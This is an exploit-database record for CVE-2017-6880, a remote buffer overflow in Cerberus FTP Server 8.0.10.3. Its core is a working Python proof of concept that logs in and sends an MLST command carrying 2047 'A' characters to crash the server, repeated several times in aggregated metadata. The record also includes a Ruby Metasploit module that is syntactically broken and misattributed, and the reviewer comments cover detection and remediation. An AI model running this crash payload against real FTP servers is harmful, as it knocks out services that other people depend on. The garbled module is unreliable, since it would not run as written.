ID EXPLOITPACK:069C0DE3BF636F433C448A3191EEA598
Type exploitpack
Reporter Nassim Asrir
Modified 2017-03-16T00:00:00
Description
Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
[+] Credits / Discovery: Nassim Asrir
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
[+] Author Company: Henceforth
[+] CVE: CVE-2017-6880
Vendor:
===============
https://www.cerberusftp.com/
Download:
===========
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
Vulnerability Type:
===================
Remote Buffer Overflow.
issue:
===================
The overflow is triggered when an attacker sends an "MLST" command whose argument is a run of 2047 "A" characters.
POC:
===================
#Simple POC by Nassim Asrir from Henceforth.
# Purpose: crash reproducer for CVE-2017-6880. It connects to an FTP server, attempts a
# login, sends a single MLST command with a 2047-character argument, and disconnects.
# Written in Python 2 style: str objects are passed directly to socket.send().
#
# Reviewer notes (defensive reading):
#  - The CVE record on this page describes the impact as a daemon crash (denial of
#    service) "or possibly ... unspecified other impact"; this script only sends the
#    long command and carries no payload beyond the filler.
#  - The script sends USER/PASS before MLST, while the CVSS vectors on this page record
#    authentication as not required. The pre-login case is not demonstrated here.
#  - Detection: the on-wire pattern is an FTP control-channel line starting with
#    "MLST " followed by about 2 KB of argument data. Match on argument length rather
#    than the filler byte, since a legitimate MLST argument is a pathname.
#  - Remediation: the page names 8.0.10.3 as the affected version and does not name a
#    fixed release; confirm the fixed version with the vendor.
import socket
# Oversized MLST argument: the character "A" repeated 2047 times.
bad_char = "A"*2047
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# Hard-coded private (RFC 1918) address and FTP control port 21, presumably the author's
# lab host. socket.connect() returns None, so `connect` holds None and is never used.
connect=s.connect(('192.168.1.81',21))
# Reads up to 1024 bytes and discards them, presumably the server greeting.
s.recv(1024)
# Login attempt; the replies are read but never checked, so the script does not know
# whether authentication succeeded before it continues.
s.send('USER nassim\r\n')
s.recv(1024)
s.send('PASS mypass\r\n')
s.recv(1024)
# The triggering request: one MLST line carrying the 2047-character argument.
s.send('MLST ' + bad_char + '\r\n')
# Closes immediately without reading a reply, so the script itself gives no indication
# of whether the server crashed; that has to be observed on the server side.
s.close()
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
Tested on:
===============
Windows 7 Sp1 (64 Bit)
{"lastseen": "2020-04-01T19:04:08", "references": [], "description": "\nCerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)", "edition": 1, "reporter": "Nassim Asrir", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2017-03-16T00:00:00", "title": "Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-6880"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142502"]}, {"type": "exploitdb", "idList": ["EDB-ID:41620"]}, {"type": "zdt", "idList": ["1337DAY-ID-27340"]}], "modified": "2020-04-01T19:04:08", "rev": 2}, "score": {"value": 6.5, "vector": "NONE", "modified": "2020-04-01T19:04:08", "rev": 2}, "vulnersScore": 6.5}, "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-03-16T00:00:00", "id": "EXPLOITPACK:069C0DE3BF636F433C448A3191EEA598", "href": "", "viewCount": 1, "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\n[+] Credits / Discovery: Nassim Asrir\n[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/\n[+] Author Company: Henceforth\n[+] CVE: CVE-2017-6880\n\nVendor:\n===============\n\nhttps://www.cerberusftp.com/\n \n \nDownload:\n===========\n\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\n \n \nVulnerability Type:\n===================\n\nRemote Buffer Overflow.\n\n\nissue:\n===================\n\nThis problem happens when the Attacker send the bad char \"A\" in the command \"MLST\" (2047).\n \nPOC:\n===================\n#Simple POC by Nassim Asrir from Henceforth.\nimport socket\nbad_char = \"A\"*2047\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\nconnect=s.connect(('192.168.1.81',21))\ns.recv(1024)\ns.send('USER nassim\\r\\n')\ns.recv(1024)\ns.send('PASS mypass\\r\\n')\ns.recv(1024)\ns.send('MLST ' + bad_char + 
'\\r\\n')\ns.close()\n\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\n \nTested on:\n=============== \n\nWindows 7 Sp1 (64 Bit)", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}
{"cve": [{"lastseen": "2020-10-03T13:07:47", "description": "Buffer overflow in Cerberus FTP Server 8.0.10.3 allows remote attackers to cause a denial of service (daemon crash) or possibly have unspecified other impact via a long MLST command.", "edition": 3, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-17T17:59:00", "title": "CVE-2017-6880", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6880"], "modified": "2017-03-21T16:54:00", "cpe": ["cpe:/a:cerberus:cerberus_ftp_server:8.0.10.3"], "id": "CVE-2017-6880", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6880", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:cerberus:cerberus_ftp_server:8.0.10.3:*:*:*:*:*:*:*"]}], "zdt": [{"lastseen": "2018-01-05T03:18:16", "description": "Exploit for windows platform in category dos / poc", "edition": 1, "published": "2017-03-17T00:00:00", "type": "zdt", "title": "Cerberus FTP Server 8.0.10.3 - MLST Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": 
"2017-03-17T00:00:00", "href": "https://0day.today/exploit/description/27340", "id": "1337DAY-ID-27340", "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\r\n[+] Credits / Discovery: Nassim Asrir\r\n[+] Author Contact: [email\u00a0protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n[+] Author Company: Henceforth\r\n[+] CVE: CVE-2017-6880\r\n \r\nVendor:\r\n===============\r\n \r\nhttps://www.cerberusftp.com/\r\n \r\n \r\nDownload:\r\n===========\r\n \r\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\r\n \r\n \r\nVulnerability Type:\r\n===================\r\n \r\nRemote Buffer Overflow.\r\n \r\n \r\nissue:\r\n===================\r\n \r\nThis problem happens when the Attacker send the bad char \"A\" in the command \"MLST\" (2047).\r\n \r\nPOC:\r\n===================\r\n#Simple POC by Nassim Asrir from Henceforth.\r\nimport socket\r\nbad_char = \"A\"*2047\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.1.81',21))\r\ns.recv(1024)\r\ns.send('USER nassim\\r\\n')\r\ns.recv(1024)\r\ns.send('PASS mypass\\r\\n')\r\ns.recv(1024)\r\ns.send('MLST ' + bad_char + '\\r\\n')\r\ns.close()\r\n \r\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\r\n \r\nTested on:\r\n=============== \r\n \r\nWindows 7 Sp1 (64 Bit)\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27340", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-05-16T03:27:08", "description": "", "published": "2017-05-15T00:00:00", "type": "packetstorm", "title": "Cerberus FTP 8.0.10.3 MLST Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-05-15T00:00:00", "id": "PACKETSTORM:142502", "href": "https://packetstormsecurity.com/files/142502/Cerberus-FTP-8.0.10.3-MLST-Buffer-Overflow.html", 
"sourceData": "`#!/usr/share/ruby \n \n#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow \n#[+] Credits / Discovery: Nassim Asrir \n#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/ \n#[+] Metasploit Module Author : Souhardya Sardar \n#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com \n#[+] Author Company: Henceforth \n#[+] CVE: CVE-2017-6880 \n \n#Vendor: \n#=============== \n# \n#https://www.cerberusftp.com/ \n \n \n#Download: \n#=========== \n# \n#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit) \n \n \n#Vulnerability Type: \n#=================== \n# \n#Remote Buffer Overflow. \n \n \n \n# ---------------------------- \n# Module Dependencies/requires \n# ---------------------------- \n \nrequire 'msf/core' \n \n# ---------------------------------- \n# Metasploit Class name and includes \n# ---------------------------------- \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Ftp \n \n# ----------------------------------------- \n# Initialize information \n# ----------------------------------------- \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Cerber FTP Remote Buffer Overflow ', \n'Description' => %q{ \nThis module exploits a buffer overflow in the Cerber FTP client that is triggered \nby sending a bad char \"A\" in the command \"MLST\" (2047) . 
\n}, \n \n'Author' => \n[ \n'Module Author And Bug Discovered by : Peter Baris', \n'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :) \n'Thanks to : Nidhish Pandya ', #auditing:) \n \n \n], \n'License' => NONE, \n'Platform' => ['win'] \n \n'References' => \n[ \n[ 'CVE', 'CVE-2017-6880' ], \n[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ] \n \n])) \n \nregister_optionsOptPort.new('SRVPORT', [true, \"The remote FTP server port\", 21]) \n], self.class) \nderegister_options('FTPUSER', 'FTPPASS') \nend \n \ndef exploit \nconnect \n \npayload = \"A\"*2047 \n \nprint_status(\"Trying to connect to target server {target.name...\") \n \n \nsock.put('MLST ' + payload + '\\r\\n') \n \nhandler \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/142502/cerberusftp-overflow.rb.txt"}], "exploitdb": [{"lastseen": "2018-11-30T12:32:51", "description": "", "published": "2017-03-16T00:00:00", "type": "exploitdb", "title": "Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow (PoC)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6880"], "modified": "2017-03-16T00:00:00", "id": "EDB-ID:41620", "href": "https://www.exploit-db.com/exploits/41620", "sourceData": "[+] Title: Cerberus FTP Server 8.0.10.3 \u2013 'MLST' Remote Buffer Overflow\r\n[+] Credits / Discovery: Nassim Asrir\r\n[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/\r\n[+] Author Company: Henceforth\r\n[+] CVE: CVE-2017-6880\r\n\r\nVendor:\r\n===============\r\n\r\nhttps://www.cerberusftp.com/\r\n \r\n \r\nDownload:\r\n===========\r\n\r\nhttps://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)\r\n \r\n \r\nVulnerability Type:\r\n===================\r\n\r\nRemote Buffer Overflow.\r\n\r\n\r\nissue:\r\n===================\r\n\r\nThis problem happens when the 
Attacker send the bad char \"A\" in the command \"MLST\" (2047).\r\n \r\nPOC:\r\n===================\r\n#Simple POC by Nassim Asrir from Henceforth.\r\nimport socket\r\nbad_char = \"A\"*2047\r\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\nconnect=s.connect(('192.168.1.81',21))\r\ns.recv(1024)\r\ns.send('USER nassim\\r\\n')\r\ns.recv(1024)\r\ns.send('PASS mypass\\r\\n')\r\ns.recv(1024)\r\ns.send('MLST ' + bad_char + '\\r\\n')\r\ns.close()\r\n\r\nhttps://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip\r\n \r\nTested on:\r\n=============== \r\n\r\nWindows 7 Sp1 (64 Bit)", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/41620"}]}